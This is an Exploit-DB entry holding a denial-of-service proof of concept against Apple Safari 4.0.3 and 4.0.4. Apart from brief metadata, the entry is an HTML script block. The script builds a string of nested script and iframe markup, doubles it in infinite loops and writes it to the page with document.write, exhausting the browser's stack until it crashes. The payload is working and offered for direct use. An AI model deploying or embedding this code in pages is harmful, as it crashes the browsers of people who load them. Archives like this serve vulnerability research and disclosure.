Apple Safari 4.0.3/4.0.4 - Stack Exhaustion
EDB-ID:
12437
CVE:
N/A
Author:
Fredrik Nordberg Almroth
Type:
dos
Platform:
Windows
Published:
2010-04-28
<script>
//Written by: Fredrik Nordberg Almroth
//URL: http://h.ackack.net/
//Affected: Safari 4.0.3 & 4.0.4 - Other versions might be vulnerable aswell.
a="<script>var b=\"<iframe src='javascript:window.location=\"boom\"'></iframe>\";while(1){b=b+b;document.write(b);}</scr"+"ipt>";
while(1){
a=a+a;
document.write(a);
}
</script>